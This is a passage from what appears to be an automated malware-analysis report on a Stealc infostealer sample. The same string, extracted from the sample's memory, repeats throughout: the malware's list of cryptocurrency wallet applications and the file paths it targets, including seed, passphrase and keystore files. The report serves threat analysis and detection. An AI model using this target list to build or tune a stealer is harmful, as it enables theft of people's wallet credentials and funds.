Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: stealc_default2.exe, 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: stealc_default2.exe, 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: stealc_default2.exe, 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: stealc_default2.exe, 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: stealc_default2.exe, 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: stealc_default2.exe, 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: stealc_default2.exe, 00000011.00000002.2162755046.0000000000D51000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\.finger-print.fp
Source: stealc_default2.exe, 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: stealc_default2.exe, 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: stealc_default2.exe, 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: stealc_default2.exe, 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: stealc_default2.exe, 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: stealc_default2.exe, 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
